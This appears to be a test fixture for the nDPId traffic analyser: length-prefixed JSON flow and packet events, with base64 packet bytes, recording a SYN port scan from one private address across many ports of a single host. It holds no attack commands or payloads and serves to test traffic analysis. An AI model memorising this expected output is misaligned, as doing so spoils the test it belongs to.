+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":465,"source":"synscan.pcap","alias":"nDPId-test","flow_id":459,"flow_packet_id":1,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059096,"pkt":"ACYLMQczACWzv5HuCABFAAAsd88AAC0Go6OsEAAIQA2GNIzSEjbdUoMYAAAAAGACCAAeWQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":466,"source":"synscan.pcap","alias":"nDPId-test","flow_id":460,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":466,"source":"synscan.pcap","alias":"nDPId-test","flow_id":460,"flow_packet_id":1,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059096,"pkt":"ACYLMQczACWzv5HuCABFAAAsmn4AADMGevSsEAAIQA2GNIzSCvDdUoMYAAAAAGACEAAdnwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":467,"source":"synscan.pcap","alias":"nDPId-test","flow_id":461,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6346,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":467,"source":"synscan.pcap","alias":"nDPId-test","flow_id":461,"flow_packet_id":1,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059096,"pkt":"ACYLMQczACWzv5HuCABFAAAsqJ0AADoGZdWsEAAIQA2GNIzSGMrdUoMYAAAAAGACDAATxQAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":468,"source":"synscan.pcap","alias":"nDPId-test","flow_id":462,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":57797,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":468,"source":"synscan.pcap","alias":"nDPId-test","flow_id":462,"flow_packet_id":1,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059096,"pkt":"ACYLMQczACWzv5HuCABFAAAshmMAACwGlg+sEAAIQA2GNIzS4cXdUoMYAAAAAGACBABSyQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":469,"source":"synscan.pcap","alias":"nDPId-test","flow_id":463,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4126,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":469,"source":"synscan.pcap","alias":"nDPId-test","flow_id":463,"flow_packet_id":1,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059096,"pkt":"ACYLMQczACWzv5HuCABFAAAsGYYAADYG+OysEAAIQA2GNIzSEB7dUoMYAAAAAGACDAAccQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":470,"source":"synscan.pcap","alias":"nDPId-test","flow_id":464,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9415,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":470,"source":"synscan.pcap","alias":"nDPId-test","flow_id":464,"flow_packet_id":1,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059096,"pkt":"ACYLMQczACWzv5HuCABFAAAsEPYAAC4GCX2sEAAIQA2GNIzSJMfdUoMYAAAAAGACDAAHyAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":471,"source":"synscan.pcap","alias":"nDPId-test","flow_id":465,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2161,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":471,"source":"synscan.pcap","alias":"nDPId-test","flow_id":465,"flow_packet_id":1,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059096,"pkt":"ACYLMQczACWzv5HuCABFAAAs5SkAAC4GNUmsEAAIQA2GNIzSCHHdUoMYAAAAAGACDAAkHgAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":472,"source":"synscan.pcap","alias":"nDPId-test","flow_id":466,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":82,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":472,"source":"synscan.pcap","alias":"nDPId-test","flow_id":466,"flow_packet_id":1,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059096,"pkt":"ACYLMQczACWzv5HuCABFAAAslo0AADMGfuWsEAAIQA2GNIzSAFLdUoMYAAAAAGACEAAoPQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":473,"source":"synscan.pcap","alias":"nDPId-test","flow_id":467,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1688,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":473,"source":"synscan.pcap","alias":"nDPId-test","flow_id":467,"flow_packet_id":1,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059155,"pkt":"ACYLMQczACWzv5HuCABFAAAsm08AADAGfSOsEAAIQA2GNIzTBpjdU4MZAAAAAGACBAAt9AAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":474,"source":"synscan.pcap","alias":"nDPId-test","flow_id":468,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1048,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":474,"source":"synscan.pcap","alias":"nDPId-test","flow_id":468,"flow_packet_id":1,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059155,"pkt":"ACYLMQczACWzv5HuCABFAAAsyLMAACUGWr+sEAAIQA2GNIzTBBjdU4MZAAAAAGACCAAsdAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":475,"source":"synscan.pcap","alias":"nDPId-test","flow_id":469,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5200,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":475,"source":"synscan.pcap","alias":"nDPId-test","flow_id":469,"flow_packet_id":1,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059155,"pkt":"ACYLMQczACWzv5HuCABFAAAs0ZUAADQGQt2sEAAIQA2GNIzTFFDdU4MZAAAAAGACBAAgPAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":476,"source":"synscan.pcap","alias":"nDPId-test","flow_id":470,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9110,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":476,"source":"synscan.pcap","alias":"nDPId-test","flow_id":470,"flow_packet_id":1,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059155,"pkt":"ACYLMQczACWzv5HuCABFAAAsdiIAADQGnlCsEAAIQA2GNIzTI5bdU4MZAAAAAGACBAAQ9gAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":477,"source":"synscan.pcap","alias":"nDPId-test","flow_id":471,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32785,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":477,"source":"synscan.pcap","alias":"nDPId-test","flow_id":471,"flow_packet_id":1,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059155,"pkt":"ACYLMQczACWzv5HuCABFAAAsAz8AADQGETSsEAAIQA2GNIzTgBHdU4MZAAAAAGACBAC0egAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":478,"source":"synscan.pcap","alias":"nDPId-test","flow_id":472,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8400,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":478,"source":"synscan.pcap","alias":"nDPId-test","flow_id":472,"flow_packet_id":1,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059155,"pkt":"ACYLMQczACWzv5HuCABFAAAsSqUAAC4Gz82sEAAIQA2GNIzTINDdU4MZAAAAAGACDAALvAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":479,"source":"synscan.pcap","alias":"nDPId-test","flow_id":473,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":60443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":479,"source":"synscan.pcap","alias":"nDPId-test","flow_id":473,"flow_packet_id":1,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059155,"pkt":"ACYLMQczACWzv5HuCABFAAAsY4AAADsGqfKsEAAIQA2GNIzT7BvdU4MZAAAAAGACEAA8cAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":480,"source":"synscan.pcap","alias":"nDPId-test","flow_id":474,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":480,"source":"synscan.pcap","alias":"nDPId-test","flow_id":474,"flow_packet_id":1,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059155,"pkt":"ACYLMQczACWzv5HuCABFAAAsynEAAC0GUQGsEAAIQA2GNIzTC7jdU4MZAAAAAGACCAAk1AAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":481,"source":"synscan.pcap","alias":"nDPId-test","flow_id":475,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1461,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":481,"source":"synscan.pcap","alias":"nDPId-test","flow_id":475,"flow_packet_id":1,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059155,"pkt":"ACYLMQczACWzv5HuCABFAAAsBJsAAC8GFNisEAAIQA2GNIzTBbXdU4MZAAAAAGACEAAi1wAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":482,"source":"synscan.pcap","alias":"nDPId-test","flow_id":476,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2260,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":482,"source":"synscan.pcap","alias":"nDPId-test","flow_id":476,"flow_packet_id":1,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059155,"pkt":"ACYLMQczACWzv5HuCABFAAAsRjMAADoGyD+sEAAIQA2GNIzTCNTdU4MZAAAAAGACDAAjuAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":483,"source":"synscan.pcap","alias":"nDPId-test","flow_id":477,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5811,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":483,"source":"synscan.pcap","alias":"nDPId-test","flow_id":477,"flow_packet_id":1,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059155,"pkt":"ACYLMQczACWzv5HuCABFAAAsZnsAAC4Gs\/esEAAIQA2GNIzTFrPdU4MZAAAAAGACDAAV2QAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":484,"source":"synscan.pcap","alias":"nDPId-test","flow_id":478,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":30,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":484,"source":"synscan.pcap","alias":"nDPId-test","flow_id":478,"flow_packet_id":1,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059155,"pkt":"ACYLMQczACWzv5HuCABFAAAsxl0AACUGXRWsEAAIQA2GNIzTAB7dU4MZAAAAAGACCAAwbgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":485,"source":"synscan.pcap","alias":"nDPId-test","flow_id":479,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059156,"flow_last_seen":1278275059156,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059156,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1027,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":485,"source":"synscan.pcap","alias":"nDPId-test","flow_id":479,"flow_packet_id":1,"flow_last_seen":1278275059156,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059156,"pkt":"ACYLMQczACWzv5HuCABFAAAsPtIAADIG16CsEAAIQA2GNIzTBAPdU4MZAAAAAGACDAAoiQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":486,"source":"synscan.pcap","alias":"nDPId-test","flow_id":480,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059156,"flow_last_seen":1278275059156,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059156,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":486,"source":"synscan.pcap","alias":"nDPId-test","flow_id":480,"flow_packet_id":1,"flow_last_seen":1278275059156,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059156,"pkt":"ACYLMQczACWzv5HuCABFAAAsn5YAADcGcdysEAAIQA2GNIzTH0DdU4MZAAAAAGACEAAJTAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":487,"source":"synscan.pcap","alias":"nDPId-test","flow_id":481,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059156,"flow_last_seen":1278275059156,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059156,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49176,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":487,"source":"synscan.pcap","alias":"nDPId-test","flow_id":481,"flow_packet_id":1,"flow_last_seen":1278275059156,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059156,"pkt":"ACYLMQczACWzv5HuCABFAAAsHnAAADgG8gKsEAAIQA2GNIzTwBjdU4MZAAAAAGACBAB0cwAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":488,"source":"synscan.pcap","alias":"nDPId-test","flow_id":482,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":82,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":488,"source":"synscan.pcap","alias":"nDPId-test","flow_id":482,"flow_packet_id":1,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059220,"pkt":"ACYLMQczACWzv5HuCABFAAAsrbQAADEGab6sEAAIQA2GNIzTAFLdU4MZAAAAAGACCAAwOgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":489,"source":"synscan.pcap","alias":"nDPId-test","flow_id":483,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2161,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":489,"source":"synscan.pcap","alias":"nDPId-test","flow_id":483,"flow_packet_id":1,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059220,"pkt":"ACYLMQczACWzv5HuCABFAAAs2p4AADMGOtSsEAAIQA2GNIzTCHHdU4MZAAAAAGACEAAgGwAAAgQFtA=="} 